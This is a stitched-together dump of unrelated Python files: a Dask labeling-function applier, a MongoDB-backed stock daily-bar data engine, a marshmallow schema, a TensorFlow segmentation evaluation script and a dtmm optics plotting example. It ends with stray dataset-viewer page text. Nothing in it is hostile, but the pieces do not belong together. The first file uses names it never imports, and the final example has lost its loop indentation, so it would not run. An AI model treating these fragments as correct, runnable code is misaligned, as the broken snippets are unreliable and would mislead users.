from dask.distributed import Client
from .core import BaseLFApplier, _FunctionCaller
from .pandas import apply_lfs_to_data_point, rows_to_triplets
Scheduler = Union[str, Client]
class DaskLFApplier(BaseLFApplier):
    """LF applier for a Dask DataFrame.

    A Dask DataFrame is a collection of Pandas DataFrame partitions, so
    labeling functions can be applied to rows in parallel across partitions.
    For more information, see https://docs.dask.org/en/stable/dataframe.html
    """

    def apply(
        self,
        df: dd.DataFrame,
        scheduler: Scheduler = "processes",
        fault_tolerant: bool = False,
    ) -> np.ndarray:
        """Label Dask DataFrame of data points with LFs.

        Parameters
        ----------
        df
            Dask DataFrame containing data points to be labeled by LFs
        scheduler
            A Dask scheduling configuration: either a string option or
            a ``Client``. For more information, see
            https://docs.dask.org/en/stable/scheduling.html#
        fault_tolerant
            Output ``-1`` if LF execution fails?

        Returns
        -------
        np.ndarray
            Matrix of labels emitted by LFs
        """
        caller = _FunctionCaller(fault_tolerant)
        label_row = partial(apply_lfs_to_data_point, lfs=self._lfs, f_caller=caller)
        # Apply the row-labeler to each partition; compute() runs the graph.
        lazy_labels = df.map_partitions(lambda part: part.apply(label_row, axis=1))
        computed = lazy_labels.compute(scheduler=scheduler)
        return self._numpy_from_row_data(rows_to_triplets(computed))
class PandasParallelLFApplier(DaskLFApplier):
    """Parallel LF applier for a Pandas DataFrame.

    Converts the Pandas DataFrame into a Dask DataFrame with ``n_parallel``
    partitions and delegates labeling to ``DaskLFApplier``.
    See ``DaskLFApplier``.
    """

    def apply(  # type: ignore
        self,
        df: pd.DataFrame,
        n_parallel: int = 2,
        scheduler: Scheduler = "processes",
        fault_tolerant: bool = False,
    ) -> np.ndarray:
        """Label Pandas DataFrame of data points with LFs in parallel using Dask.

        Parameters
        ----------
        df
            Pandas DataFrame containing data points to be labeled by LFs
        n_parallel
            Parallelism level for LF application. Corresponds to ``npartitions``
            in constructed Dask DataFrame. For ``scheduler="processes"``, number
            of processes launched. Recommended to be no more than the number
            of cores on the running machine.
        scheduler
            A Dask scheduling configuration: either a string option or
            a ``Client``. For more information, see
            https://docs.dask.org/en/stable/scheduling.html#
        fault_tolerant
            Output ``-1`` if LF execution fails?

        Returns
        -------
        np.ndarray
            Matrix of labels emitted by LFs
        """
        if n_parallel < 2:
            raise ValueError(
                "n_parallel should be >= 2. "
                "For single process Pandas, use PandasLFApplier."
            )
        dask_df = dd.from_pandas(df, npartitions=n_parallel)
        return super().apply(dask_df, scheduler=scheduler, fault_tolerant=fault_tolerant)
|
from DyCommon.DyCommon import *
from EventEngine.DyEvent import *
from ..DyStockDataCommon import *
from .Common.DyStockDataCommonEngine import *
class DyStockDataDaysEngine(object):
    """Historical daily-bar data engine for stocks (indexes, funds).

    Manages the stock code table and trade-day data via the common engine,
    loads daily bars and adjust factors from MongoDB, and updates missing
    history through the gateway, driven by events.
    """

    def __init__(self, eventEngie, mongoDbEngine, gateway, info, registerEvent=True):
        # NOTE: parameter name 'eventEngie' (sic) is kept for caller compatibility.
        self._eventEngine = eventEngie
        self._mongoDbEngine = mongoDbEngine
        self._gateway = gateway
        self._info = info

        self._commonEngine = DyStockDataCommonEngine(self._mongoDbEngine, self._gateway, self._info)
        self._progress = DyProgress(self._info)

        self._updatedCodeCount = 0  # counter of codes whose daily data was actually updated
        self._codeDaysDf = {}  # {code: daily-bar DataFrame}
        self._codeAdjFactors = {}  # {code: adjust factor}
        # Robustness: initialize the stop flag here so the update handler can
        # read it even if a stop request arrives before an update starts.
        self._isStopped = False

        if registerEvent:
            self._registerEvent()

    def _loadDays(self, startDate, endDate, indicators):
        """Load daily bars of all codes in [startDate, endDate] into self._codeDaysDf."""
        self._info.print('开始载入{0}只股票(指数,基金)的日线数据[{1}, {2}]...'.format(len(self.stockAllCodesFunds), startDate, endDate))
        # init
        self._codeDaysDf = {}
        # enable progress display
        self._progress.init(len(self.stockAllCodesFunds), 100, 5)
        for code, name in self.stockAllCodesFunds.items():
            df = self._mongoDbEngine.getOneCodeDays(code, startDate, endDate, indicators, name)
            if df is not None:
                self._codeDaysDf[code] = df
            self._progress.update()
        self._info.print('股票(指数,基金)的日线数据载入完成')
        return True

    def _getDaysNotInDb(self, tradeDays, codes, indicators):
        """Find which daily data is missing from the database.

        @tradeDays: [trade day]
        @codes: {code: name}
        @indicators: [indicator]
        @return: {code: {indicator: [trade day]}} or None if nothing is missing
        """
        self._info.print('开始从数据库获取日线不存在的数据...')
        self._progress.init(len(codes), 100)
        data = {}
        for code in codes:
            temp = self._mongoDbEngine.getNotExistingDates(code, tradeDays, indicators)
            if temp:
                data[code] = temp
            self._progress.update()
        return data if data else None

    def _updateHistDaysBasic(self, startDate, endDate):
        """Update the all-A-share code table and trade-day data.

        NOTE: sector component-code updating (updateAllSectorCodes) is
        intentionally disabled here.
        """
        return self._commonEngine.updateCodes() and self._commonEngine.updateTradeDays(startDate, endDate)

    def _getUpdatedCodes(self, startDate, endDate, indicators, isForced, codes=None):
        """Determine which codes/indicators/days actually need updating.

        @return: {code: {indicator: [trade day]}}, or None when nothing needs
                 updating (a finish event is put in that case).
        """
        # get trade days
        tradeDays = self._commonEngine.getTradeDays(startDate, endDate)
        # get stock codes, including indexes and funds
        codes = self.stockAllCodesFunds if codes is None else codes
        # get not existing from DB
        if not isForced:
            codes = self._getDaysNotInDb(tradeDays, codes, indicators)
            if not codes:
                self._info.print("历史日线数据已经在数据库")
                self._progress.init(0)
                self._eventEngine.put(DyEvent(DyEventType.finish))
                return None
        else:
            # forced update: schedule every indicator for every trade day
            newCodes = {}
            if tradeDays and indicators:
                for code in codes:
                    newCodes[code] = {}
                    for indicator in indicators:
                        newCodes[code][indicator] = tradeDays
            codes = newCodes
            if not codes:
                self._info.print("没有日线数据需要更新")
                self._progress.init(0)
                self._eventEngine.put(DyEvent(DyEventType.finish))
                return None
        return codes

    def _updateHistDays(self, startDate, endDate, indicators, isForced=False, codes=None):
        """Kick off the event-driven daily-bar update loop."""
        # get updated codes data info
        codes = self._getUpdatedCodes(startDate, endDate, indicators, isForced, codes)
        if codes is None:
            return
        # init
        self._isStopped = False
        self._updatedCodeCount = 0
        self._progress.init(len(codes), 10)
        self._info.print("开始更新{0}只股票(指数,基金)的历史日线数据...".format(len(codes)))
        # send for updating
        event = DyEvent(DyEventType.updateStockHistDays_)
        event.data = codes
        self._eventEngine.put(event)

    def _update(self, startDate, endDate, indicators, isForced=False, codes=None):
        """Update basic tables first, then the daily-bar history."""
        # update all stock A code table, trade day table and sector code table firstly
        if not self._updateHistDaysBasic(startDate, endDate):
            self._printCount()
            self._eventEngine.put(DyEvent(DyEventType.fail))
            return
        # notify "one-click update" listeners that the common data is ready
        event = DyEvent(DyEventType.stockDaysCommonUpdateFinish)
        event.data['startDate'] = startDate
        event.data['endDate'] = endDate
        self._eventEngine.put(event)
        # update the daily-bar data
        self._updateHistDays(startDate, endDate, indicators, isForced, codes)

    def _autoUpdate(self):
        """Update from the day after the latest date in DB up to today."""
        # get latest date from DB
        latestDate = self._commonEngine.getLatestDateInDb()
        if latestDate is None:
            self._info.print("数据库里没有日线数据", DyLogData.error)
            self._eventEngine.put(DyEvent(DyEventType.fail))
            return
        # greedily use today as the largest possible end date
        endDate = datetime.now().strftime("%Y-%m-%d")
        # check if now is after trading time
        ret = self._gateway.isNowAfterTradingTime()
        if ret is None:  # error
            self._eventEngine.put(DyEvent(DyEventType.fail))
            return
        if ret is False:  # now is trade day and before end of trading time
            self._info.print("今天是交易日, 请18:00后更新今日日线数据", DyLogData.error)
            self._eventEngine.put(DyEvent(DyEventType.fail))
            return
        startDate = DyTime.getDateStr(latestDate, 1)  # next date after latest date in DB
        # compare dates
        if endDate < startDate:
            # update progress UI
            self._progress.init(0)
            self._info.print("数据库日线数据已经是最新", DyLogData.ind)
            self._eventEngine.put(DyEvent(DyEventType.finish))
            return
        self._update(startDate, endDate, DyStockDataCommon.dayIndicators)

    def _updateStockHistDaysHandler(self, event):
        """Handle an update request; event.data of None means auto-update from DB."""
        self._progress.reset()
        if event.data is None:
            self._autoUpdate()
        else:
            # unpack
            startDate = event.data['startDate']
            endDate = event.data['endDate']
            indicators = event.data['indicators']  # list
            isForced = event.data['forced']
            codes = event.data['codes'] if 'codes' in event.data else None
            # update
            self._update(startDate, endDate, indicators, isForced, codes)

    def _stopReqHandler(self, event):
        """Request the running update loop to stop at the next code boundary."""
        self._isStopped = True

    def _updateStockSectorCodesHandler(self, event):
        """Update component-code tables for the requested sector indexes."""
        sectorCodeList = event.data['sectorCode']
        startDate = event.data['startDate']
        endDate = event.data['endDate']
        self._progress.reset()
        for sectorCode in sectorCodeList:
            if not self._commonEngine.updateSectorCodes(sectorCode, startDate, endDate):
                self._eventEngine.put(DyEvent(DyEventType.fail))
                return
        self._eventEngine.put(DyEvent(DyEventType.finish))

    def _updateOneCode(self, code, data):
        """Fetch one code's missing daily data from the gateway and write it to DB.

        @data: {indicator: [trade day]} — day lists may differ per indicator,
               so fetch the union date range covering all requested indicators.
        """
        # get max date range
        startDate, endDate = None, None
        for _, dates in data.items():
            if startDate is None:
                startDate = dates[0]
                endDate = dates[-1]
            else:
                if operator.lt(dates[0], startDate):
                    startDate = dates[0]
                if operator.gt(dates[-1], endDate):
                    endDate = dates[-1]
        # get from Gateway
        data = self._gateway.getDays(code, startDate, endDate, sorted(data), self.stockAllCodesFunds[code])
        if not data:  # None(errors) or no data
            if data is None:  # indicate fetching data error from engine point of view
                self._info.print("¥DyStockDataDaysEngine¥: 获取{}({})日线数据[{}, {}]失败".format(code, self.stockAllCodesFunds[code], startDate, endDate), DyLogData.error)
            return
        # update to DB
        if self._mongoDbEngine.updateDays(code, data):
            # count codes whose data was missing in DB and was written successfully
            self._updatedCodeCount += 1

    def _printCount(self):
        """Report how many codes actually got their daily data updated."""
        self._info.print('由于股票停牌或者没有上市, 更新了{0}只股票(指数,基金)日线数据'.format(self._updatedCodeCount), DyLogData.ind)

    def _updateStockHistDays_Handler(self, event):
        """Update one code per event, then re-post the remainder.

        Processing a single code at a time keeps the event loop responsive so
        a stop request can interrupt the update between codes.
        """
        # unpack
        codes = event.data
        # check stop flag firstly
        if self._isStopped:
            self._printCount()
            self._eventEngine.put(DyEvent(DyEventType.stopAck))
            return
        # update one code each time
        code = sorted(codes)[0]
        self._updateOneCode(code, codes[code])
        # update progress
        self._progress.update()
        # delete updated code
        del codes[code]
        if not codes:  # all codes are updated
            self._printCount()
            self._eventEngine.put(DyEvent(DyEventType.finish))
            return
        # send for next updating
        event = DyEvent(DyEventType.updateStockHistDays_)
        event.data = codes
        self._eventEngine.put(event)

    def _loadCommon(self, dates, codes):
        """Load code table and trade days; return (oldestDay, latestDay) or (None, None)."""
        if not self._commonEngine.load(dates, codes):
            return None, None
        return self._commonEngine.tOldestDay(), self._commonEngine.tLatestDay()

    def _loadAdjFactors(self, date, latestAdjFactorInDb):
        """Load the adjust factor at @date for every code already loaded.

        @latestAdjFactorInDb: True - use the latest adjust factor in the DB
                              (typical for screening/regression); False - use
                              the factor at @date (typical for backtesting).
        """
        self._info.print('开始载入复权因子...')
        # init
        self._codeAdjFactors = {}
        if latestAdjFactorInDb:  # use the latest trade day in DB as the factor date
            date = self._commonEngine.getLatestTradeDayInDb()
            if date is None:
                return False
        # init progress
        self._progress.init(len(self._codeDaysDf), 100, 10)
        # load adjust factors, based on the loaded daily bars
        for code, _ in self._codeDaysDf.items():
            adjFactor = self._mongoDbEngine.getAdjFactor(code, date, self.stockAllCodesFunds[code])
            if adjFactor is not None:
                self._codeAdjFactors[code] = adjFactor
            else:
                self._info.print('{0}:{1}复权因子缺失[{2}]'.format(code, self.stockAllCodesFunds[code], date), DyLogData.warning)
            self._progress.update()
        self._info.print('复权因子载入完成')
        return True

    def _processAdj(self):
        """Forward-adjust prices and volumes of the loaded daily bars in place."""
        self._info.print("开始前复权...")
        self._progress.init(len(self._codeDaysDf), 100, 20)
        # NOTE(review): a code whose adjust factor was missing (warned in
        # _loadAdjFactors) would raise KeyError below — confirm upstream
        # guarantees every loaded code has a factor.
        for code, df in self._codeDaysDf.items():
            # ratio of each bar's adjust factor to the reference factor
            adjFactor = df['adjfactor']/self._codeAdjFactors[code]
            adjFactor = adjFactor.values.reshape((adjFactor.shape[0], 1))
            # price columns
            prices = df[['open', 'high', 'low', 'close']].values
            df[['open', 'high', 'low', 'close']] = prices * adjFactor
            # volume scales inversely with the price adjustment
            df[['volume']] = df[['volume']].values / adjFactor
            self._progress.update()
        self._info.print("前复权完成")

    def _unionDates(self, startDate, endDate, dates):
        """Extend [startDate, endDate] with any explicit date strings in @dates."""
        for date in dates:
            if isinstance(date, str):
                if operator.lt(date, startDate):
                    startDate = date
                if operator.gt(date, endDate):
                    endDate = date
        return startDate, endDate

    def _loadOneCodeDays(self, code, dates, indicators):
        """Load one stock's daily bars; its corresponding index is loaded too.

        The stock may have been listed earlier than its index.
        """
        # load the stock's daily bars
        df = self._mongoDbEngine.getOneCodeDaysUnified(code, dates, indicators, self.stockAllCodesFundsSectors[code])
        if df is None:
            return None, None
        # init
        self._codeDaysDf = {}
        # set stock DF
        self._codeDaysDf[code] = df
        # new days
        startDay = df.index[0].strftime("%Y-%m-%d")
        endDay = df.index[-1].strftime("%Y-%m-%d")
        # load the corresponding index's daily bars
        index = self.getIndex(code)
        df = self._mongoDbEngine.getOneCodeDays(index, startDay, endDay, indicators, self.stockIndexes[index])
        # !!! the stock may have been listed earlier than the index
        if df is not None:
            self._codeDaysDf[index] = df
        # union of dates, needed for trade-day loading
        return self._unionDates(startDay, endDay, dates)

    def _registerEvent(self):
        """Register this engine's event handlers."""
        self._eventEngine.register(DyEventType.updateStockHistDays, self._updateStockHistDaysHandler, DyStockDataEventHandType.daysEngine)
        self._eventEngine.register(DyEventType.updateStockHistDays_, self._updateStockHistDays_Handler, DyStockDataEventHandType.daysEngine)
        self._eventEngine.register(DyEventType.stopUpdateStockHistDaysReq, self._stopReqHandler, DyStockDataEventHandType.daysEngine)
        self._eventEngine.register(DyEventType.updateStockSectorCodes, self._updateStockSectorCodesHandler, DyStockDataEventHandType.daysEngine)

    ####################################################
    # ------------------ public API ------------------
    ####################################################
    def test(self):
        pass

    def tDaysOffset(self, base, n=0):
        return self._commonEngine.tDaysOffset(base, n)

    def tDays(self, start, end):
        return self._commonEngine.tDays(start, end)

    def tLatestDay(self):
        return self._commonEngine.tLatestDay()

    def tLatestDayInDb(self):
        return self._commonEngine.getLatestTradeDayInDb()

    def tDaysCountInDb(self, start, end):
        return self._commonEngine.tDaysCountInDb(start, end)

    def tDaysOffsetInDb(self, base, n=0):
        return self._commonEngine.tDaysOffsetInDb(base, n)

    def codeTDayOffset(self, code, baseDate, n=0, strict=True):
        """Get a stock's trade day by offset from @baseDate.

        @strict: strict mode; when False, return the stock's maximum
                 available offset in the database.
        """
        return self._mongoDbEngine.codeTDayOffset(code, baseDate, n, strict)

    def getCode(self, name):
        """Get a stock code by stock name."""
        return self._commonEngine.getCode(name)

    @property
    def shIndex(self):
        return self._commonEngine.shIndex

    @property
    def szIndex(self):
        return self._commonEngine.szIndex

    @property
    def cybIndex(self):
        return self._commonEngine.cybIndex

    @property
    def zxbIndex(self):
        return self._commonEngine.zxbIndex

    @property
    def etf50(self):
        return self._commonEngine.etf50

    @property
    def etf300(self):
        return self._commonEngine.etf300

    @property
    def etf500(self):
        return self._commonEngine.etf500

    @property
    def stockFunds(self):
        return self._commonEngine.stockFunds

    @property
    def stockCodesFunds(self):
        return self._commonEngine.stockCodesFunds

    @property
    def stockAllCodesFunds(self):
        return self._commonEngine.stockAllCodesFunds

    @property
    def stockAllCodesFundsSectors(self):
        return self._commonEngine.stockAllCodesFundsSectors

    @property
    def stockCodes(self):
        return self._commonEngine.stockCodes

    @property
    def stockAllCodes(self):
        return self._commonEngine.stockAllCodes

    @property
    def stockIndexes(self):
        """Market indexes."""
        return self._commonEngine.stockIndexes

    @property
    def stockIndexesSectors(self):
        """Market indexes and sector indexes."""
        return self._commonEngine.stockIndexesSectors

    def getIndex(self, code):
        """Get the market index corresponding to a stock."""
        return self._commonEngine.getIndex(code)

    def getIndexStockCodes(self, index=None):
        """Get the stock code table contained in a market index."""
        return self._commonEngine.getIndexStockCodes(index)

    def getIndexSectorStockCodes(self, index=None):
        """Get the stock code table contained in a market or sector index."""
        return self._commonEngine.getIndexSectorStockCodes(index)

    def loadCodeTable(self, codes=None):
        return self._commonEngine.loadCodeTable(codes)

    def loadSectorCodeTable(self, sectorCode, date, codes=None):
        """Load the component code table of a sector."""
        return self._commonEngine.loadSectorCodeTable(sectorCode, date, codes)

    def getSectorCodes(self, sectorCode):
        """Get a sector's component code table.

        Call after @loadSectorCodeTable.
        @return: {code: name}
        """
        return self._commonEngine.getSectorCodes(sectorCode)

    def loadTradeDays(self, dates):
        return self._commonEngine.loadTradeDays(dates)

    def loadCommon(self, dates, codes=None):
        return self._commonEngine.load(dates, codes)

    def getStockMarketDate(self, code, name=None):
        return self._mongoDbEngine.getStockMarketDate(code, name)

    def loadCode(self, code, dates, indicators=DyStockDataCommon.dayIndicators, latestAdjFactorInDb=True):
        """Load one stock's (fund's) daily bars from DB; its index is loaded too.

        @dates: a list in one of the following forms:
                [startDate, endDate]
                [baseDate, (+/-)n]  negative looks backwards, positive forwards
                [startDate, baseDate, +n]
                [-n, baseDate, +n]
                [-n, startDate, endDate]
        @latestAdjFactorInDb: True - forward-adjust with the latest adjust
                              factor in DB (screening/regression); False -
                              forward-adjust with the end day's factor
                              (live backtesting).
        """
        # load the stock code table
        if not self.loadCodeTable([code]):
            self._info.print('载入[{0}]股票代码表失败'.format(code), DyLogData.error)
            return False
        # load the stock's daily bars
        startDay, endDay = self._loadOneCodeDays(code, dates, indicators)
        if startDay is None:
            self._info.print('载入[{0}:{1}]日线数据失败{2}'.format(code, self.stockAllCodesFundsSectors[code], dates), DyLogData.error)
            return False
        # load trade-day data
        if not self.loadTradeDays([startDay, endDay]):
            self._info.print('载入交易日数据失败', DyLogData.error)
            return False
        # load adjust factors
        if not self._loadAdjFactors(endDay, latestAdjFactorInDb):
            self._info.print('载入复权因子失败', DyLogData.error)
            return False
        # forward adjust
        self._processAdj()
        return True

    def load(self, dates, indicators=DyStockDataCommon.dayIndicators, latestAdjFactorInDb=True, codes=None):
        """Load stock (fund) daily bars based on trade days; indexes always loaded.

        @dates: a list in one of the following forms:
                [startDate, endDate]
                [baseDate, (+/-)n]  negative looks backwards, positive forwards
                [startDate, baseDate, +n]
                [-n, baseDate, +n]
                [-n, startDate, endDate]
        @latestAdjFactorInDb: True - forward-adjust with the latest adjust
                              factor in DB (screening/regression); False -
                              forward-adjust with the end day's factor
                              (live backtesting).
        @codes: [code]; indexes are always loaded. None - load all stocks
                (funds); [] - load index data only.
        """
        # load common data
        startDay, endDay = self._loadCommon(dates, codes)
        if startDay is None:
            self._info.print('DyStockDataEngine._loadCommon: 载入数据失败', DyLogData.error)
            return False
        # load daily bars
        if not self._loadDays(startDay, endDay, indicators):
            self._info.print('DyStockDataEngine._loadDays: 载入数据失败', DyLogData.error)
            return False
        # load adjust factors
        if not self._loadAdjFactors(endDay, latestAdjFactorInDb):
            self._info.print('DyStockDataEngine._loadAdjFactors: 载入数据失败', DyLogData.error)
            return False
        # forward adjust
        self._processAdj()
        return True

    def getDataFrame(self, code, date=None, n=None):
        """Get a code's loaded daily DataFrame, optionally sliced.

        @date: base date; None returns the whole DataFrame
        @n: int offset relative to @date (negative = backwards), or an end
            date string when not an int
        """
        df = self._codeDaysDf.get(code)
        if df is None:
            return None
        if date is None:
            return df
        if isinstance(n, int):
            # convert to absolute dates
            endDay = self.tDaysOffset(date, 0)
            startDay = self.tDaysOffset(date, n)
            if n > 0:
                startDay, endDay = endDay, startDay
        else:
            startDay, endDay = self.tDaysOffset(date, 0), n
        # !!! With only a single row, the label slice below can miss it,
        # so handle that case explicitly.
        retDf = None
        if df.shape[0] == 1:
            if startDay == endDay and startDay in df.index:
                retDf = df
        if retDf is None:
            retDf = df[startDay:endDay]
        return retDf

    def isExisting(self, code, date):
        """True if @code's loaded daily data contains @date."""
        if code not in self._codeDaysDf:
            return False
        try:
            # BUG FIX: DataFrame.ix was removed in pandas 1.0; .loc raises
            # the same lookup errors for missing labels.
            self._codeDaysDf[code].loc[date]
        except Exception:
            return False
        return True
|
""" Generic common schemas """
from marshmallow import Schema, fields
class IdSchema(Schema):
    """Simple ID schema exposing a single integer ``id`` field."""

    id = fields.Integer()
|
import shutil
import os
import random
import numpy as np
from tensorflow import random as tf_random
import yaml
from pathlib import Path
from datetime import datetime
import pytz
import git
from gcp_utils import copy_folder_locally_if_missing
from image_utils import ImagesAndMasksGenerator
from models import generate_compiled_segmentation_model
from metrics_utils import global_threshold
from local_utils import local_folder_has_files, getSystemInfo, getLibVersions
# test can be run multiple times (with or without optimized thresholds, global thresholds), create new each time
test_datetime = datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ')  # UTC timestamp fixed at import time
metadata_file_name = 'metadata_' + test_datetime + '.yaml'
tmp_directory = Path('./tmp')  # scratch space; wiped and recreated by test()
def test(gcp_bucket, dataset_id, model_id, batch_size, trained_thresholds_id, random_module_global_seed,
         numpy_random_global_seed, tf_random_global_seed, message):
    """Evaluate a trained segmentation model on a test dataset and upload results.

    Copies the dataset and model from ``gcp_bucket`` into a local tmp
    directory, runs ``model.evaluate`` on the test split, writes a metrics
    CSV plus a metadata YAML, and syncs everything back to the bucket.

    Parameters
    ----------
    gcp_bucket : str
        ``gs://`` bucket holding ``datasets/`` and ``models/`` folders.
    dataset_id, model_id : str
        IDs of the dataset and model folders inside the bucket.
    batch_size : int
        Batch size used during inference.
    trained_thresholds_id : str or None
        Optional file id of trained per-class thresholds inside the model dir.
    random_module_global_seed, numpy_random_global_seed, tf_random_global_seed : int or None
        Optional global seeds; None means "do not seed".
    message : str or None
        Free-form note recorded in the metadata.
    """
    # seed global random generators if specified; global random seeds here must be int or default None (no seed given)
    if random_module_global_seed is not None:
        random.seed(random_module_global_seed)
    if numpy_random_global_seed is not None:
        np.random.seed(numpy_random_global_seed)
    if tf_random_global_seed is not None:
        tf_random.set_seed(tf_random_global_seed)

    start_dt = datetime.now()

    assert "gs://" in gcp_bucket

    # clean up the tmp directory
    try:
        shutil.rmtree(tmp_directory.as_posix())
    except FileNotFoundError:
        pass
    tmp_directory.mkdir()

    local_dataset_dir = Path(tmp_directory, 'datasets')
    local_model_dir = Path(tmp_directory, 'models')

    copy_folder_locally_if_missing(os.path.join(gcp_bucket, 'datasets', dataset_id), local_dataset_dir)
    local_folder_has_files(local_dataset_dir, dataset_id)

    copy_folder_locally_if_missing(os.path.join(gcp_bucket, 'models', model_id), local_model_dir)
    local_folder_has_files(local_model_dir, model_id)

    test_id = "{}_{}".format(model_id, dataset_id)
    test_dir = Path(tmp_directory, 'tests', test_id)
    test_dir.mkdir(parents=True)

    with Path(local_dataset_dir, dataset_id, 'config.yaml').open('r') as f:
        dataset_config = yaml.safe_load(f)['dataset_config']

    with Path(local_model_dir, model_id, 'config.yaml').open('r') as f:
        train_config = yaml.safe_load(f)['train_config']

    if trained_thresholds_id is not None:
        with Path(local_model_dir, model_id, trained_thresholds_id).open('r') as f:
            threshold_output_data = yaml.safe_load(f)

    target_size = dataset_config['target_size']

    test_generator = ImagesAndMasksGenerator(
        Path(local_dataset_dir, dataset_id, 'test').as_posix(),
        rescale=1. / 255,
        target_size=target_size,
        batch_size=batch_size,
        seed=None if 'test_data_shuffle_seed' not in train_config else train_config['test_data_shuffle_seed'])

    # Collect per-class optimized thresholds when a successful thresholds
    # training output exists; otherwise fall back to the global threshold.
    optimized_class_thresholds = {}
    if trained_thresholds_id is not None and 'thresholds_training_output' in threshold_output_data['metadata']:
        for i in range(len(test_generator.mask_filenames)):
            if ('x' in threshold_output_data['metadata']['thresholds_training_output'][str('class' + str(i))] and
                    threshold_output_data['metadata']['thresholds_training_output'][str('class' + str(i))]['success']):
                optimized_class_thresholds.update(
                    {str('class' + str(i)): threshold_output_data['metadata']['thresholds_training_output'][str('class' + str(i))]['x']}
                )
            else:
                # BUG FIX: the exception was previously constructed but never
                # raised, silently ignoring unsuccessfully trained thresholds.
                raise AssertionError('Unsuccessfully trained threshold attempted to be loaded.')
    else:
        optimized_class_thresholds = None

    compiled_model = generate_compiled_segmentation_model(
        train_config['segmentation_model']['model_name'],
        train_config['segmentation_model']['model_parameters'],
        len(test_generator.mask_filenames),
        train_config['loss'],
        train_config['optimizer'],
        Path(local_model_dir, model_id, "model.hdf5").as_posix(),
        optimized_class_thresholds=optimized_class_thresholds)

    results = compiled_model.evaluate(test_generator)
    metric_names = [m.name for m in compiled_model.metrics]

    # write the metrics CSV: one header row, one value row
    with Path(test_dir, str('metrics_' + test_datetime + '.csv')).open('w') as f:
        f.write(','.join(metric_names) + '\n')
        f.write(','.join(map(str, results)))

    metadata_sys = {
        'System_info': getSystemInfo(),
        'Lib_versions_info': getLibVersions()
    }

    metadata = {
        'message': message,
        'gcp_bucket': gcp_bucket,
        'dataset_id': dataset_id,
        'model_id': model_id,
        'trained_thresholds_id': trained_thresholds_id,
        'trained_class_thresholds_loaded': optimized_class_thresholds,  # global thresh used if None
        'default_global_threshold_for_reference': global_threshold,
        'batch_size': batch_size,
        'created_datetime': datetime.now(pytz.UTC).strftime('%Y%m%dT%H%M%SZ'),
        'git_hash': git.Repo(search_parent_directories=True).head.object.hexsha,
        'elapsed_minutes': round((datetime.now() - start_dt).total_seconds() / 60, 1),
        'dataset_config': dataset_config,
        'train_config': train_config,
        # NOTE: hyphenated key kept (inconsistent with the other seed keys)
        # for compatibility with existing metadata consumers.
        'random-module-global-seed': random_module_global_seed,
        'numpy_random_global_seed': numpy_random_global_seed,
        'tf_random_global_seed': tf_random_global_seed,
        'metadata_system': metadata_sys
    }

    with Path(test_dir, metadata_file_name).open('w') as f:
        yaml.safe_dump(metadata, f)

    # upload results; -n skips files that already exist in the bucket
    os.system("gsutil -m cp -n -r '{}' '{}'".format(Path(tmp_directory, 'tests').as_posix(), gcp_bucket))

    print('\n Test Metadata:')
    print(metadata)
    print('\n')

    shutil.rmtree(tmp_directory.as_posix())
if __name__ == "__main__":
    import argparse
    import sys

    argparser = argparse.ArgumentParser(sys.argv[0])
    # --- data locations ---
    argparser.add_argument(
        '--gcp-bucket',
        type=str,
        help='The GCP bucket where the raw data is located and to use to store the processed stacks.')
    argparser.add_argument(
        '--dataset-id',
        type=str,
        help='The dataset ID.')
    argparser.add_argument(
        '--model-id',
        type=str,
        help='The model ID.')
    # --- inference settings ---
    argparser.add_argument(
        '--batch-size',
        type=int,
        default=16,
        help='The batch size to use during inference.')
    argparser.add_argument(
        '--trained-thresholds-id',
        type=str,
        default=None,
        help='The specified trained thresholds file id.')
    # --- reproducibility seeds (default None means unseeded) ---
    argparser.add_argument(
        '--random-module-global-seed',
        type=int,
        default=None,
        help='The setting of random.seed(global seed), where global seed is int or default None (no seed given).')
    argparser.add_argument(
        '--numpy-random-global-seed',
        type=int,
        default=None,
        help='The setting of np.random.seed(global seed), where global seed is int or default None (no seed given).')
    argparser.add_argument(
        '--tf-random-global-seed',
        type=int,
        default=None,
        help='The setting of tf.random.set_seed(global seed), where global seed is int or default None (no seed given).')
    argparser.add_argument(
        '--message',
        type=str,
        default=None,
        # typo fix in user-facing help text: "the used wants" -> "the user wants"
        help='A str message the user wants to leave, the default is None.')

    # Forward the parsed CLI arguments as keyword arguments to test().
    test(**argparser.parse_args().__dict__)
|
"""EM field example"""
import dtmm
import numpy as np
import matplotlib.pyplot as plt
WAVELENGTHS = [500,600]
SIZE = (128,128)
window = dtmm.aperture((128,128))
field_data = dtmm.illumination_data(SIZE, WAVELENGTHS,window = window,jones = (1,0),
pixelsize = 200, beta = (0,0.1,0.2), phi = (0.,0.,np.pi/6))
field = field_data[0]
#500nm
Ex = field[:,0,0] #Ex of the x-polarized light
subplots1 = [plt.subplot(i) for i in (231,232,233)]
subplots2 = [plt.subplot(i) for i in (234,235,236)]
for i,ax in enumerate(subplots1):
ax.imshow(Ex[i].real, origin = "lower")
#600nm
Ex = field[:,1,0]
for i,ax in enumerate(subplots2):
ax.imshow(Ex[i].real, origin = "lower")
plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.